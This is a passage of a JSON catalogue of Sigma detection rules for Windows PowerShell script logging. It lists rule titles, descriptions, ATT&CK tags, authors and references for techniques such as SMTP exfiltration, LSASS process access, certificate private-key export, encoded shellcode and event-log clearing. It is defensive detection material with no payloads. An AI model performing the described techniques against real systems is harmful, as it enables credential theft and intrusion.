"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ], + "creation_date": "2021/12/16", + "filename": "posh_ps_security_software_discovery.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "value": "Powershell Exfiltration Over SMTP", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2022/09/26", + "filename": "posh_ps_send_mailmessage.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect adversaries enumerate sensitive files", + "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", + "value": "Powershell Sensitive File Discovery", + "meta": { + "refs": [ + "https://twitter.com/malmoeb/status/1570814999370801158", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2022/09/16", + "filename": "posh_ps_sensitive_file_discovery.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "value": "Change PowerShell Policies to an Insecure Level - PowerShell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/10/20", + "filename": "posh_ps_set_policies_to_unsecure_level.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrator script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Base64 encoded Shellcode", + "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "value": "PowerShell ShellCode", + "meta": { + "refs": [ + "https://twitter.com/cyb3rops/status/1063072865992523776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2018/11/17", + "filename": "posh_ps_shellcode_b64.yml", + "author": "David Ledbetter (shellcode), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "value": "Malicious ShellIntel PowerShell Commandlets", + "meta": { + "refs": [ + "https://github.com/Shellntel/scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2021/08/09", + "filename": "posh_ps_shellintel_malicious_commandlets.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "value": "Detected Windows Software Discovery - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ], + "creation_date": "2020/10/16", + "filename": "posh_ps_software_discovery.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", + "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "value": "Powershell Store File In Alternate Data Stream", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2021/09/02", + "filename": "posh_ps_store_file_in_alternate_data_stream.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", + "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/15", + "filename": "posh_ps_susp_ad_group_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "value": "Suspicious Eventlog Clear", + "meta": { + "refs": [ + "https://twitter.com/oroneequalsone/status/1568432028361830402", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ], + "creation_date": "2022/09/12", + "filename": "posh_ps_susp_clear_eventlog.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "value": "Powershell Directory Enumeration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_susp_directory_enum.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell download command", + "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "value": "Suspicious PowerShell Download - Powershell Script", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_susp_download.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "value": "Powershell Execute Batch Script", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2022/01/02", + "filename": "posh_ps_susp_execute_batch_script.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administration script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "value": "Suspicious Export-PfxCertificate", + "meta": { + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "creation_date": "2021/04/23", + "filename": "posh_ps_susp_export_pfxcertificate.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", + "value": "Extracting Information with PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2021/12/19", + "filename": "posh_ps_susp_extracting.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "value": "Troubleshooting Pack Cmdlet Execution", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1537919885031772161", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/06/21", + "filename": "posh_ps_susp_follina_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "value": "PowerShell Get-Process LSASS in ScriptBlock", + "meta": { + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/04/23", + "filename": "posh_ps_susp_getprocess_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Powershell code that execute COM Objects", + "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "value": "Suspicious GetTypeFromCLSID ShellExecute", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/04/02", + "filename": "posh_ps_susp_gettypefromclsid.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", + "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of PowerShell to identify the current logged user.", + "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "value": "Suspicious PowerShell Get Current User", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/04/04", + "filename": "posh_ps_susp_get_current_user.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", + "value": "Suspicious GPO Discovery With Get-GPO", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ], + "creation_date": "2022/06/04", + "filename": "posh_ps_susp_get_gpo.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Get the processes that are running on the local computer.", + "uuid": "af4c87ce-bdda-4215-b998-15220772e993", + "value": "Suspicious Process Discovery With Get-Process", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_susp_get_process.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", + "value": "Suspicious Get-WmiObject", + "meta": { + "refs": [ + "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ], + "creation_date": "2022/01/12", + "filename": "posh_ps_susp_gwmi.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "value": "Suspicious Hyper-V Cmdlets", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006" + ], + "creation_date": "2022/04/09", + "filename": "posh_ps_susp_hyper_v_condlet.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "uuid": "ed965133-513f-41d9-a441-e38076a0798f", + "value": "Suspicious PowerShell Invocations - Generic", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/12", + "filename": "posh_ps_susp_invocation_generic.yml", + "author": "Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "value": "Suspicious PowerShell Invocations - Specific", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_ps_susp_invocation_specific.yml", + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", + "value": "Change User Agents with WebRequest", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2022/01/23", + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "value": "Suspicious IO.FileStream", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2022/01/09", + "filename": "posh_ps_susp_iofilestream.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", + "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "value": "Suspicious PowerShell Keywords", + "meta": { + "refs": [ + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", + "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/02/11", + "filename": "posh_ps_susp_keywords.yml", + "author": "Florian Roth, Perez Diego (@darkquassar)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "value": "Suspicious Get Local Groups Information - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2021/12/12", + "filename": "posh_ps_susp_local_group_reco.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "value": "Powershell Local Email Collection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114.001" + ], + "creation_date": "2021/07/21", + "filename": "posh_ps_susp_mail_acces.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", + "value": "PowerShell Deleted Mounted Share", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ], + "creation_date": "2020/10/08", + "filename": "posh_ps_susp_mounted_share_deletion.yml", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "level": "medium", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", + "value": "Suspicious Mount-DiskImage", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ], + "creation_date": "2022/02/01", + "filename": "posh_ps_susp_mount_diskimage.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", + "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "value": "Suspicious Connection to Remote Account", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ], + "creation_date": "2021/12/27", + "filename": "posh_ps_susp_networkcredential.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", + "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "value": "Suspicious New-PSDrive to Admin Share", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2022/08/13", + "filename": "posh_ps_susp_new_psdrive.yml", + "author": 